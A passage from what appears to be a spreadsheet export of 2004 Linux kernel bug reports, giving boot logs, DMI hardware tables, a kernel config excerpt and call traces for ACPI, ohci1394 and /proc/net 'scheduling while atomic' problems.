PTLTD ) @ 0x000f6da0 &lt;6&gt;ACPI: RSDT (v001 PTLTD RSDT 0x06040000 LTP 0x00000000) @ 0x0fffc510 &lt;6&gt;ACPI: FADT (v001 CLEVO HOFFA 0x06040000 PTL_ 0x000f4240) @ 0x0ffffb8c &lt;6&gt;ACPI: DSDT (v001 Clevo PTL_ACPI 0x06040000 MSFT 0x0100000b) @ 0x00000000 &lt;4&gt;Building zonelist for node : 0 &lt;4&gt;Kernel command line: root=/dev/hda2 vga=normal splash=silent 1 &lt;4&gt;Local APIC disabled by BIOS -- reenabling. &lt;4&gt;Found and enabled local APIC! &lt;6&gt;Initializing CPU#0 &lt;4&gt;PID hash table entries: 1024 (order 10: 8192 bytes) &lt;4&gt;Detected 1000.222 MHz processor. &lt;6&gt;Using tsc for high-res timesource &lt;4&gt;Console: colour VGA+ 80x25 &lt;6&gt;Memory: 255368k/262080k available (2041k kernel code, 5992k reserved, 740k data, 168k init, 0k highmem) &lt;4&gt;Checking if this processor honours the WP bit even in supervisor mode... Ok. &lt;4&gt;Calibrating delay loop... 1957.88 BogoMIPS &lt;6&gt;Dentry cache hash table entries: 32768 (order: 5, 131072 bytes) &lt;4&gt;Inode-cache hash table entries: 16384 (order: 4, 65536 bytes) &lt;4&gt;Mount-cache hash table entries: 512 (order: 0, 4096 bytes) &lt;7&gt;CPU: After generic identify, caps: 0383fbff 00000000 00000000 00000000 &lt;7&gt;CPU: After vendor identify, caps: 0383fbff 00000000 00000000 00000000 &lt;6&gt;CPU: L1 I cache: 16K, L1 D cache: 16K &lt;6&gt;CPU: L2 cache: 256K &lt;7&gt;CPU: After all inits, caps: 0383fbf7 00000000 00000000 00000040 &lt;6&gt;Intel machine check architecture supported. &lt;6&gt;Intel machine check reporting enabled on CPU#0. &lt;4&gt;CPU: Intel Pentium III (Coppermine) stepping 0a &lt;6&gt;Enabling fast FPU save and restore... done. &lt;6&gt;Enabling unmasked SIMD FPU exception support... done. &lt;6&gt;Checking 'hlt' instruction... OK. &lt;4&gt;POSIX conformance testing by UNIFIX &lt;4&gt;enabled ExtINT on CPU#0 &lt;4&gt;ESR value before enabling vector: 00000000 &lt;4&gt;ESR value after enabling vector: 00000000 &lt;4&gt;Using local APIC timer interrupts. &lt;4&gt;calibrating APIC timer ... &lt;4&gt;..... CPU clock speed is 999.0562 MHz. &lt;4&gt;..... host bus clock speed is 133.0274 MHz. &lt;6&gt;NET: Registered protocol family 16 &lt;6&gt;PCI: PCI BIOS revision 2.10 entry at 0xfd82e, last bus=1 &lt;6&gt;PCI: Using configuration type 1 &lt;6&gt;mtrr: v2.0 (20020519) &lt;6&gt;ACPI: Subsystem revision 20040116 &lt;4&gt;ACPI: IRQ10 SCI: Level Trigger. &lt;4&gt; ACPI-1120: *** Error: Method execution failed [\_SB_.PCI0.PIB_.SIRA._STA] (Node cfc52914), AE_AML_NO_RETURN_VALUE &lt;4&gt; ACPI-0098: *** Error: Method execution failed [\_SB_.PCI0.PIB_.SIRA._STA] (Node cfc52914), AE_AML_NO_RETURN_VALUE &lt;6&gt;ACPI: Interpreter enabled &lt;6&gt;ACPI: Using PIC for interrupt routing &lt;6&gt;ACPI: PCI Root Bridge [PCI0] (00:00) &lt;4&gt;PCI: Probing PCI hardware (bus 00) &lt;7&gt;ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] &lt;4&gt;ACPI: PCI Interrupt Link [LNKA] (IRQs 11 13 14 15) &lt;4&gt;ACPI: PCI Interrupt Link [LNKB] (IRQs *5 13 14 15) &lt;4&gt;ACPI: PCI Interrupt Link [LNKC] (IRQs *10 13 14 15) &lt;4&gt;ACPI: PCI Interrupt Link [LNKD] (IRQs *11 13 14 15) &lt;6&gt;ACPI: Embedded Controller [EC0] (gpe 12) &lt;6&gt;ACPI: Power Resource [PFNL] (on) &lt;6&gt;ACPI: Power Resource [PFNH] (on) &lt;4&gt;ACPI: PCI Interrupt Link [LNKD] enabled at IRQ 11 &lt;4&gt;ACPI: PCI Interrupt Link [LNKC] enabled at IRQ 10 &lt;4&gt;ACPI: PCI Interrupt Link [LNKA] enabled at IRQ 11 &lt;4&gt;ACPI: PCI Interrupt Link [LNKB] enabled at IRQ 5 &lt;6&gt;PCI: Using ACPI for IRQ routing &lt;6&gt;PCI: if you experience problems, try using option 'pci=noacpi' or even 'acpi=off' &lt;6&gt;apm: BIOS version 1.2 Flags 0x03 (Driver version 1.16ac) &lt;5&gt;apm: overridden by ACPI. &lt;6&gt;ikconfig 0.7 with /proc/config* &lt;6&gt;Initializing Cryptographic API &lt;6&gt;PCI: Disabling Via external APIC routing &lt;6&gt;ACPI: AC Adapter [ADP0] (on-line) &lt;6&gt;ACPI: Battery Slot [BAT0] (battery present) &lt;6&gt;ACPI: Power Button (FF) [PWRF] &lt;6&gt;ACPI: Sleep Button (CM) [SLPB] &lt;6&gt;ACPI: Lid Switch [LID] &lt;6&gt;ACPI: Fan [FANL] (on) &lt;6&gt;ACPI: Fan [FANH] (on) &lt;6&gt;ACPI: Processor [CPU0] (supports C1 C2, 16 throttling states) &lt;6&gt;ACPI: Thermal Zone [THM0] (46 C) &lt;4&gt;pty: 256 Unix98 ptys configured --------- dmidecode ------------ SMBIOS 2.3 present. DMI 2.3 present. 62 structures occupying 1976 bytes. DMI table at 0x000DC010. Handle 0x0000 DMI type 0, 20 bytes. BIOS Information Block Vendor: Phoenix Version: 4.06CJ15 Release: 01/25/2002 BIOS base: 0xEA8A0 ROM size: 192K Capabilities: Flags: 0x0000000000005F90 Handle 0x0001 DMI type 1, 25 bytes. System Information Block Vendor: CLEVO Corporation Product: Apollo Pro133AX Version: 8500V Serial Number: Handle 0x0002 DMI type 2, 8 bytes. Board Information Block Vendor: VIA Product: 694x686a Version: None Serial Number: None Handle 0x0003 DMI type 3, 17 bytes. Chassis Information Block Vendor: No Enclosure Chassis Type: Other Version: N/A Serial Number: None Asset Tag: No Asset Tag Handle 0x0004 DMI type 4, 32 bytes. Processor Socket Designation: Slot 1 Processor Type: Central Processor Processor Family: Pentium III processor Processor Manufacturer: GenuineIntel Processor Version: Pentium(R) III Handle 0x0005 DMI type 5, 22 bytes. Memory Controller Handle 0x0006 DMI type 6, 12 bytes. Memory Bank Socket: DIM 1 Banks: 0 1 Speed: 60nS Type: Installed Size: 256Mbyte (Double sided) Enabled Size: 256Mbyte (Double sided) Handle 0x0007 DMI type 6, 12 bytes. Memory Bank Socket: DIM 2 Banks: 2 3 Speed: 60nS Type: Installed Size: Not Installed Enabled Size: Not Installed Handle 0x0008 DMI type 6, 12 bytes. Memory Bank Socket: DIM 3 Banks: 4 5 Speed: 60nS Type: Installed Size: Not Installed Enabled Size: Not Installed Handle 0x0009 DMI type 7, 19 bytes. Cache Socket: L1 Cache L1 socketed Internal Cache: write-back L1 Cache Size: 16K L1 Cache Maximum: 16K L1 Cache Type: Asynchronous Handle 0x000A DMI type 7, 19 bytes. Cache Socket: L2 Cache L2 socketed External Cache: write-through L2 Cache Size: 512K L2 Cache Maximum: 256K L2 Cache Type: Burst Handle 0x000B DMI type 8, 9 bytes. Port Connector Internal Designator: Primary IDE Internal Connector Type: On Board IDE External Designator: (null) External Connector Type: None Port Type: Other Handle 0x000C DMI type 8, 9 bytes. Port Connector Internal Designator: Secondary IDE Internal Connector Type: On Board IDE External Designator: (null) External Connector Type: None Port Type: Other Handle 0x000D DMI type 8, 9 bytes. Port Connector Internal Designator: FLOPPY Internal Connector Type: On Board Floppy External Designator: (null) External Connector Type: None Port Type: Other Handle 0x000E DMI type 8, 9 bytes. Port Connector Internal Designator: (null) Internal Connector Type: None External Designator: COM1 External Connector Type: DB-9 pin male Port Type: Serial Port XT/AT Compatible Handle 0x000F DMI type 8, 9 bytes. Port Connector Internal Designator: (null) Internal Connector Type: None External Designator: COM2 External Connector Type: DB-9 pin male Port Type: Serial Port XT/AT Compatible Handle 0x0010 DMI type 8, 9 bytes. Port Connector Internal Designator: (null) Internal Connector Type: None External Designator: IR External Connector Type: Infrared Port Type: Other Handle 0x0011 DMI type 8, 9 bytes. Port Connector Internal Designator: (null) Internal Connector Type: None External Designator: Printer External Connector Type: DB-25 pin female Port Type: Parallel Port ECP/EPP Handle 0x0012 DMI type 8, 9 bytes. Port Connector Internal Designator: (null) Internal Connector Type: None External Designator: KBD External Connector Type: PS/2 Port Type: Keyboard Port Handle 0x0013 DMI type 8, 9 bytes. Port Connector Internal Designator: (null) Internal Connector Type: None External Designator: Mouse External Connector Type: PS/2 Port Type: Mouse Port Handle 0x0014 DMI type 8, 9 bytes. Port Connector Internal Designator: CD_IN Internal Connector Type: On Board Sound Input from CD-ROM External Designator: (null) External Connector Type: None Port Type: Other Handle 0x0015 DMI type 8, 9 bytes. Port Connector Internal Designator: (null) Internal Connector Type: None External Designator: Game Port External Connector Type: DB-15 pin female Port Type: Joy Stick Port Handle 0x0016 DMI type 8, 9 bytes. Port Connector Internal Designator: (null) Internal Connector Type: None External Designator: MIC_IN External Connector Type: RJ-11 Port Type: MIDI Port Handle 0x0017 DMI type 8, 9 bytes. Port Connector Internal Designator: (null) Internal Connector Type: None External Designator: LINE_IN External Connector Type: RJ-11 Port Type: MIDI Port Handle 0x0018 DMI type 8, 9 bytes. Port Connector Internal Designator: (null) Internal Connector Type: None External Designator: LINE_OUT External Connector Type: RJ-11 Port Type: MIDI Port Handle 0x0019 DMI type 8, 9 bytes. Port Connector Internal Designator: FC Internal Connector Type: Other External Designator: (null) External Connector Type: None Port Type: MIDI Port Handle 0x001A DMI type 8, 9 bytes. Port Connector Internal Designator: USB1 Internal Connector Type: Other External Designator: (null) External Connector Type: None Port Type: USB Handle 0x001B DMI type 8, 9 bytes. Port Connector Internal Designator: USB2 Internal Connector Type: Other External Designator: (null) External Connector Type: None Port Type: USB Handle 0x001C DMI type 9, 13 bytes. Card Slot Slot: PCI Slot 1 Type: 32bit Long PCI Slot Features: 5v Handle 0x001D DMI type 9, 13 bytes. Card Slot Slot: PCI Slot 2 Type: 32bit Long PCI Slot Features: 5v Handle 0x001E DMI type 9, 13 bytes. Card Slot Slot: PCI Slot 3 Type: 32bit Long PCI Slot Features: 5v Handle 0x001F DMI type 9, 13 bytes. Card Slot Slot: PCI Slot 4 Type: 32bit Long PCI Slot Features: 5v Handle 0x0020 DMI type 9, 13 bytes. Card Slot Slot: ISA Slot 1 Type: 16bit Long ISA Handle 0x0021 DMI type 10, 6 bytes. On Board Devices Information Description: ESS 1988 Sound : Disabled Type: Sound Handle 0x0022 DMI type 11, 5 bytes. OEM Data VIA www.via.com.tw w3.via.com.tw Handle 0x0023 DMI type 12, 5 bytes. Configuration Information Intel CPU Voltage CPU TYPE VR1 VR2 Vcore VIO P54C VRE 9-10 5-6,7-8 3.4-3.6V 3.4-3.6V P54C STD 7-8 5-6,7-8 3.3V 3.3V P55C MMX 3-4 1-2,3-4 2.8V 3.4V CPU Clock Rate FRACTION FREQ1 FREQ2 1.5x 1-2 1-2 2x 2-3 1-2 2.5x 2-3 2-3 3x 1-2 2-3 Bus FREQ Clk1 Clk2 Clk3 50MHz 2-3 2-3 2-3 60MHz 1-2 2-3 2-3 66MHz 2-3 1-2 2-3 Handle 0x0024 DMI type 15, 29 bytes. Event Log Log Area: 80 bytes. Log Header At: 0. Log Data At: 16. Log Type: 4. Log Valid: Yes. Handle 0x0025 DMI type 16, 15 bytes. Physical Memory Array Location: System board or motherboard Use: System memory Error Correction Type: None Maximum Capacity: 393216 Kbyte Error Information Handle: Not Provided Number of Devices: 3 Handle 0x0026 DMI type 17, 23 bytes. Memory Device Array Handle: 0x0025 Error Information Handle: None Total Width: 72 bits Data Width: 64 bits Size: 256 Mbyte Form Factor: DIMM Set: 0x01 Locator: M1 Bank Locator: Bank 0 Type: DRAM Type Detail: Synchronous Speed: Unknown Handle 0x0027 DMI type 17, 23 bytes. Memory Device Array Handle: 0x0025 Error Information Handle: None Total Width: 0 bits Data Width: 0 bits Size: 0 Mbyte Form Factor: DIMM Set: 0x01 Locator: M2 Bank Locator: Bank 1 Type: DRAM Type Detail: Synchronous Speed: Unknown Handle 0x0028 DMI type 17, 23 bytes. Memory Device Array Handle: 0x0025 Error Information Handle: None Total Width: 0 bits Data Width: 0 bits Size: 0 Mbyte Form Factor: DIMM Set: 0x01 Locator: M3 Bank Locator: Bank 2 Type: DRAM Type Detail: Synchronous Speed: Unknown Handle 0x0029 DMI type 19, 15 bytes. Memory Array Mapped Address Handle 0x002A DMI type 20, 19 bytes. Memory Device Mapped Address Handle 0x002B DMI type 23, 13 bytes. System Reset Handle 0x002C DMI type 24, 5 bytes. Hardware Security Handle 0x002D DMI type 25, 9 bytes. System Power Controls Handle 0x002E DMI type 26, 20 bytes. Voltage Sensor Description: Voltage Probe Device Location: Processor Device Status: OK Maximum Value: Unknown Minimum Value: Unknown Resolution: Unknown Tolerance: Unknown Accuracy: Unknown Handle 0x002F DMI type 27, 12 bytes. Cooling Device Device Type: Device Status: Handle 0x0030 DMI type 28, 20 bytes. Temperature Sensor Description: Temperature Probe Device Location: Processor Device Status: OK Maximum Value: Unknown Minimum Value: Unknown Resolution: Unknown Tolerance: Unknown Accuracy: Unknown Handle 0x0031 DMI type 29, 20 bytes. Current Sensor Description: Electrical Current Probe Device Location: Processor Device Status: OK Maximum Value: Unknown Minimum Value: Unknown Resolution: Unknown Tolerance: Unknown Accuracy: Unknown Handle 0x0032 DMI type 30, 6 bytes. Out-of-Band Remote Access Handle 0x0033 DMI type 31, 28 bytes. Boot Integrity Services Entry Point Handle 0x0034 DMI type 32, 20 bytes. System Boot Information Handle 0x0035 DMI type 33, 31 bytes. 64-bit Memory Error Information Handle 0x0036 DMI type 34, 11 bytes. Management Device Description: Management Device 1 Device Type: LM80 Address Type: Handle 0x0037 DMI type 34, 11 bytes. Management Device Description: Management Device 2 Device Type: LM81 Address Type: Handle 0x0038 DMI type 35, 11 bytes. Management Device Component Description: Management Device Component 1 Device Handle : 0x0036 Component Handle: 0x002e Threshold Handle: 0x003a Handle 0x0039 DMI type 35, 11 bytes. Management Device Component Description: Management Device Component 2 Device Handle : 0x0037 Component Handle: 0xffff Threshold Handle: 0x003b Handle 0x003A DMI type 36, 16 bytes. Management Device Threshold Data e8 03 e8 03 e8 03 e8 03 e8 03 e8 03 ............ Handle 0x003B DMI type 36, 16 bytes. Management Device Threshold Data e8 03 e8 03 e8 03 e8 03 e8 03 e8 03 ............ Handle 0x003C DMI type 126, 4 bytes. Inactive Handle 0x003D DMI type 127, 4 bytes. End-of-Table RSD PTR found at 0xF6DA0. OEM PTLTD PNP BIOS present. ---------- .config snip ---------- CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y CONFIG_EXPERIMENTAL=y CONFIG_CLEAN_COMPILE=y CONFIG_BROKEN_ON_SMP=y CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_BSD_PROCESS_ACCT=y CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=14 CONFIG_IKCONFIG=y CONFIG_IKCONFIG_PROC=y CONFIG_KALLSYMS=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_OBSOLETE_MODPARM=y CONFIG_MODVERSIONS=y CONFIG_KMOD=y CONFIG_X86_PC=y CONFIG_MPENTIUMIII=y CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=5 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_UP_APIC=y CONFIG_X86_UP_IOAPIC=y CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_X86_TSC=y CONFIG_X86_MCE=y CONFIG_MICROCODE=m CONFIG_X86_MSR=m CONFIG_X86_CPUID=m CONFIG_NOHIGHMEM=y CONFIG_MTRR=y CONFIG_PM=y CONFIG_ACPI=y CONFIG_ACPI_BOOT=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_AC=y CONFIG_ACPI_BATTERY=y CONFIG_ACPI_BUTTON=y CONFIG_ACPI_FAN=y CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y CONFIG_ACPI_ASUS=m CONFIG_ACPI_TOSHIBA=m CONFIG_ACPI_BUS=y CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y CONFIG_APM=y CONFIG_APM_DO_ENABLE=y CONFIG_APM_ALLOW_INTS=y CONFIG_PCI=y CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCI_LEGACY_PROC=y CONFIG_PCI_NAMES=y CONFIG_HOTPLUG=y CONFIG_PCMCIA=m CONFIG_YENTA=m CONFIG_CARDBUS=y CONFIG_BINFMT_ELF=y CONFIG_BINFMT_AOUT=m CONFIG_BINFMT_MISC=m Steps to reproduce: Boot and wait</t>
  </si>
  <si>
    <t>Kernel crash on loading ohci1394</t>
  </si>
  <si>
    <t>2.6.2-mm1</t>
  </si>
  <si>
    <t>2004-02-06 05:23 UTC</t>
  </si>
  <si>
    <t>2004-03-11 04:46 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 9.0 64-bit (x86_64) Hardware Environment: 2 x AMD Opteron 240, Tyan Thunder K8W, 1 GB RAM (4 x 256, two nodes, dual-channel), Adaptec AHA19160 + SCSI CD-RW (Toshiba), LSI 53C1010 64-bit SCSI + 2 x HDD (IBM), NEC-based USB 2.0 adapter (Manhattan), GeForce FX5200 (LeadTek), SATA HDD (Seagate), IDE DVD (Liteon) Software Environment: Out-of-the box SuSE 9.0 (downloadable version) + Linux 2.6.2-mm1 Problem Description: The kernel crashes on an attempt to load the ohci1394 driver Steps to reproduce: Try "modprobe ohci1394"</t>
  </si>
  <si>
    <t>uninitialized spinlock in acpi/ec.c</t>
  </si>
  <si>
    <t>2.6.2 at least...</t>
  </si>
  <si>
    <t>2004-02-06 06:18 UTC</t>
  </si>
  <si>
    <t>Wilfried Klaebe</t>
  </si>
  <si>
    <t>2004-11-30 22:00 UTC</t>
  </si>
  <si>
    <t>Distribution: debian testing/unstable Hardware Environment: IBM ThinkPad R40 (2722-B3G) Software Environment: Problem Description: While booting, ec.c complains about an uninitialized spinlock. Steps to reproduce: boot dmesg, config, etc. pp. at http://www.toppoint.de/~wklaebe/TP-R40-2722B3G/</t>
  </si>
  <si>
    <t>viewing /proc/net files chrash scheduler</t>
  </si>
  <si>
    <t>2004-02-06 15:58 UTC</t>
  </si>
  <si>
    <t>Michael Letzgus</t>
  </si>
  <si>
    <t>2004-02-19 10:33 UTC</t>
  </si>
  <si>
    <t>process_other</t>
  </si>
  <si>
    <t>Distribution: Debain unstable Hardware Environment: x86 (Athlon Thunderbird) Software Environment: console + X Problem Description: crash while viewing /proc/net/arp, /proc/net/decnet or /proc/net/decnet_cache Steps to reproduce: view the given files with Midnight Commanders 'view' function and watch your syslog: Feb 7 00:35:47 heros kernel: bad: scheduling while atomic! Feb 7 00:35:47 heros kernel: Call Trace: Feb 7 00:35:47 heros kernel: [schedule+1393/1408] schedule+0x571/0x580 Feb 7 00:35:47 heros kernel: [__get_free_pages+31/80] __get_free_pages+0x1f/0x50 Feb 7 00:35:47 heros kernel: [schedule_timeout+181/192] schedule_timeout+0xb5/0xc0 Feb 7 00:35:47 heros kernel: [normal_poll+268/352] normal_poll+0x10c/0x160 Feb 7 00:35:47 heros kernel: [tty_poll+101/128] tty_poll+0x65/0x80 Feb 7 00:35:47 heros kernel: [do_select+399/720] do_select+0x18f/0x2d0 Feb 7 00:35:47 heros kernel: [__pollwait+0/208] __pollwait+0x0/0xd0 Feb 7 00:35:47 heros kernel: [sys_select+719/1264] sys_select+0x2cf/0x4f0 Feb 7 00:35:47 heros kernel: [syscall_call+7/11] syscall_call+0x7/0xb Feb 7 00:35:47 heros kernel: Feb 7 00:35:49 heros kernel: bad: scheduling while atomic! Feb 7 00:35:49 heros kernel: Call Trace: Feb 7 00:35:49 heros kernel: [schedule+1393/1408] schedule+0x571/0x580 Feb 7 00:35:49 heros kernel: [schedule_timeout+99/192] schedule_timeout+0x63/0xc0 Feb 7 00:35:49 heros kernel: [process_timeout+0/16] process_timeout+0x0/0x10 Feb 7 00:35:49 heros kernel: [do_select+399/720] do_select+0x18f/0x2d0 Feb 7 00:35:49 heros kernel: [__pollwait+0/208] __pollwait+0x0/0xd0 Feb 7 00:35:49 heros kernel: [sys_select+719/1264] sys_select+0x2cf/0x4f0 Feb 7 00:35:49 heros kernel: [syscall_call+7/11] syscall_call+0x7/0xb Feb 7 00:35:49 heros kernel: Feb 7 00:35:52 heros kernel: bad: scheduling while atomic! Feb 7 00:35:52 heros kernel: Call Trace: Feb 7 00:35:52 heros kernel: [schedule+1393/1408] schedule+0x571/0x580 Feb 7 00:35:52 heros kernel: [__get_free_pages+31/80] __get_free_pages+0x1f/0x50 Feb 7 00:35:52 heros kernel: [schedule_timeout+181/192] schedule_timeout+0xb5/0xc0 Feb 7 00:35:52 heros kernel: [normal_poll+268/352] normal_poll+0x10c/0x160 Feb 7 00:35:52 heros kernel: [tty_poll+101/128] tty_poll+0x65/0x80 Feb 7 00:35:52 heros kernel: [do_select+399/720] do_select+0x18f/0x2d0 Feb 7 00:35:52 heros kernel: [__pollwait+0/208] __pollwait+0x0/0xd0 Feb 7 00:35:52 heros kernel: [sys_select+719/1264] sys_select+0x2cf/0x4f0 Feb 7 00:35:52 heros kernel: [syscall_call+7/11] syscall_call+0x7/0xb Feb 7 00:35:52 heros kernel: Feb 7 00:35:52 heros kernel: bad: scheduling while atomic! Feb 7 00:35:52 heros kernel: Call Trace: Feb 7 00:35:52 heros kernel: [schedule+1393/1408] schedule+0x571/0x580 Feb 7 00:35:52 heros kernel: [__get_free_pages+31/80] __get_free_pages+0x1f/0x50 Feb 7 00:35:52 heros kernel: [schedule_timeout+181/192] schedule_timeout+0xb5/0xc0 Feb 7 00:35:52 heros kernel: [normal_poll+268/352] normal_poll+0x10c/0x160 Feb 7 00:35:52 heros kernel: [tty_poll+101/128] tty_poll+0x65/0x80 Feb 7 00:35:52 heros kernel: [do_select+399/720] do_select+0x18f/0x2d0 Feb 7 00:35:52 heros kernel: [__pollwait+0/208] __pollwait+0x0/0xd0 Feb 7 00:35:52 heros kernel: [sys_select+719/1264] sys_select+0x2cf/0x4f0 Feb 7 00:35:52 heros kernel: [syscall_call+7/11] syscall_call+0x7/0xb Feb 7 00:35:52 heros kernel: Feb 7 00:35:53 heros kernel: bad: scheduling while atomic! Feb 7 00:35:53 heros kernel: Call Trace: Feb 7 00:35:53 heros kernel: [schedule+1393/1408] schedule+0x571/0x580 Feb 7 00:35:53 heros kernel: [__get_free_pages+31/80] __get_free_pages+0x1f/0x50 Feb 7 00:35:53 heros kernel: [schedule_timeout+181/192] schedule_timeout+0xb5/0xc0 Feb 7 00:35:53 heros kernel: [normal_poll+268/352] normal_poll+0x10c/0x160 Feb 7 00:35:53 heros kernel: [tty_poll+101/128] tty_poll+0x65/0x80 Feb 7 00:35:53 heros kernel: [do_select+399/720] do_select+0x18f/0x2d0 Feb 7 00:35:53 heros kernel: [__pollwait+0/208] __pollwait+0x0/0xd0 Feb 7 00:35:53 heros kernel: [sys_select+719/1264] sys_select+0x2cf/0x4f0 Feb 7 00:35:53 heros kernel: [syscall_call+7/11] syscall_call+0x7/0xb Feb 7 00:35:53 heros kernel: Feb 7 00:35:53 heros kernel: bad: scheduling while atomic! Feb 7 00:35:53 heros kernel: Call Trace: Feb 7 00:35:53 heros kernel: [schedule+1393/1408] schedule+0x571/0x580 Feb 7 00:35:53 heros kernel: [__get_free_pages+31/80] __get_free_pages+0x1f/0x50 Feb 7 00:35:53 heros kernel: [schedule_timeout+181/192] schedule_timeout+0xb5/0xc0 Feb 7 00:35:53 heros kernel: [normal_poll+268/352] normal_poll+0x10c/0x160 Feb 7 00:35:53 heros kernel: [tty_poll+101/128] tty_poll+0x65/0x80 Feb 7 00:35:53 heros kernel: [do_select+399/720] do_select+0x18f/0x2d0 Feb 7 00:35:53 heros kernel: [__pollwait+0/208] __pollwait+0x0/0xd0 Feb 7 00:35:53 heros kernel: [sys_select+719/1264] sys_select+0x2cf/0x4f0 Feb 7 00:35:53 heros kernel: [syscall_call+7/11] syscall_call+0x7/0xb Feb 7 00:35:53 heros kernel: Feb 7 00:35:54 heros kernel: bad: scheduling while atomic! Feb 7 00:35:54 heros kernel: Call Trace: Feb 7 00:35:54 heros kernel: [schedule+1393/1408] schedule+0x571/0x580 Feb 7 00:35:54 heros kernel: [schedule_timeout+99/192] schedule_timeout+0x63/0xc0 Feb 7 00:35:54 heros kernel: [process_timeout+0/16] process_timeout+0x0/0x10 Feb 7 00:35:54 heros kernel: [do_select+399/720] do_select+0x18f/0x2d0 Feb 7 00:35:54 heros kernel: [__pollwait+0/208] __pollwait+0x0/0xd0 Feb 7 00:35:54 heros kernel: [sys_select+719/1264] sys_select+0x2cf/0x4f0 Feb 7 00:35:54 heros kernel: [syscall_call+7/11] syscall_call+0x7/0xb Feb 7 00:35:54 heros kernel: Feb 7 00:35:54 heros kernel: bad: scheduling while atomic! Feb 7 00:35:54 heros kernel: Call Trace: Feb 7 00:35:54 heros kernel: [schedule+1393/1408] schedule+0x571/0x580 Feb 7 00:35:54 heros kernel: [__get_free_pages+31/80] __get_free_pages+0x1f/0x50 Feb 7 00:35:54 heros kernel: [schedule_timeout+181/192] schedule_timeout+0xb5/0xc0 Feb 7 00:35:54 heros kernel: [normal_poll+268/352] normal_poll+0x10c/0x160 Feb 7 00:35:54 heros kernel: [tty_poll+101/128] tty_poll+0x65/0x80 Feb 7 00:35:54 heros kernel: [do_select+399/720] do_select+0x18f/0x2d0 Feb 7 00:35:54 heros kernel: [__pollwait+0/208] __pollwait+0x0/0xd0 Feb 7 00:35:54 heros kernel: [sys_select+719/1264] sys_select+0x2cf/0x4f0 Feb 7 00:35:54 heros kernel: [syscall_call+7/11] syscall_call+0x7/0xb Feb 7 00:35:54 heros kernel: Feb 7 00:35:55 heros kernel: bad: scheduling while atomic! Feb 7 00:35:55 heros kernel: Call Trace: Feb 7 00:35:55 heros kernel: [schedule+1393/1408] schedule+0x571/0x580 Feb 7 00:35:55 heros kernel: [__get_free_pages+31/80] __get_free_pages+0x1f/0x50 Feb 7 00:35:55 heros kernel: [schedule_timeout+181/192] schedule_timeout+0xb5/0xc0 Feb 7 00:35:55 heros kernel: [normal_poll+268/352] normal_poll+0x10c/0x160 Feb 7 00:35:55 heros kernel: [tty_poll+101/128] tty_poll+0x65/0x80 Feb 7 00:35:55 heros kernel: [do_select+399/720] do_select+0x18f/0x2d0 Feb 7 00:35:55 heros kernel: [__pollwait+0/208] __pollwait+0x0/0xd0 Feb 7 00:35:55 heros kernel: [sys_select+719/1264] sys_select+0x2cf/0x4f0 Feb 7 00:35:55 heros kernel: [syscall_call+7/11] syscall_call+0x7/0xb Feb 7 00:35:55 heros kernel: Feb 7 00:35:55 heros kernel: bad: scheduling while atomic! Feb 7 00:35:55 heros kernel: Call Trace: Feb 7 00:35:55 heros kernel: [schedule+1393/1408] schedule+0x571/0x580 Feb 7 00:35:55 heros kernel: [do_IRQ+260/304] do_IRQ+0x104/0x130 Feb 7 00:35:55 heros kernel: [work_resched+5/22] work_resched+0x5/0x16 Feb 7 00:35:55 heros kernel: Feb 7 00:35:55 heros kernel: bad: scheduling while atomic! Feb 7 00:35:55 heros kernel: Call Trace: Feb 7 00:35:55 heros kernel: [schedule+1393/1408] schedule+0x571/0x580 Feb 7 00:35:55 heros kernel: [__get_free_pages+31/80] __get_free_pages+0x1f/0x50 Feb 7 00:35:55 heros kernel: [schedule_timeout+181/192] schedule_timeout+0xb5/0xc0 Feb 7 00:35:55 heros kernel: [normal_poll+268/352] normal_poll+0x10c/0x160 Feb 7 00:35:55 heros kernel: [tty_poll+101/128] tty_poll+0x65/0x80 Feb 7 00:35:55 heros kernel: [do_select+399/720] do_select+0x18f/0x2d0 Feb 7 00:35:55 heros kernel: [__pollwait+0/208] __pollwait+0x0/0xd0 Feb 7 00:35:55 heros kernel: [sys_select+719/1264] sys_select+0x2cf/0x4f0 Feb 7 00:35:55 heros kernel: [syscall_call+7/11] syscall_call+0x7/0xb Feb 7 00:35:55 heros kernel: Feb 7 00:35:56 heros kernel: bad: scheduling while atomic! Feb 7 00:35:56 heros kernel: Call Trace: Feb 7 00:35:56 heros kernel: [schedule+1393/1408] schedule+0x571/0x580 Feb 7 00:35:56 heros kernel: [__get_free_pages+31/80] __get_free_pages+0x1f/0x50 Feb 7 00:35:56 heros kernel: [schedule_timeout+181/192] schedule_timeout+0xb5/0xc0 Feb 7 00:35:56 heros kernel: [normal_poll+268/352] normal_poll+0x10c/0x160 Feb 7 00:35:56 heros kernel: [tty_poll+101/128] tty_poll+0x65/0x80 Feb 7 00:35:56 heros kernel: [do_select+399/720] do_select+0x18f/0x2d0 Feb 7 00:35:56 heros kernel: [__pollwait+0/208] __pollwait+0x0/0xd0 Feb 7 00:35:56 heros kernel: [sys_select+719/1264] sys_select+0x2cf/0x4f0 Feb 7 00:35:56 heros kernel: [syscall_call+7/11] syscall_call+0x7/0xb Feb 7 00:35:56 heros kernel: 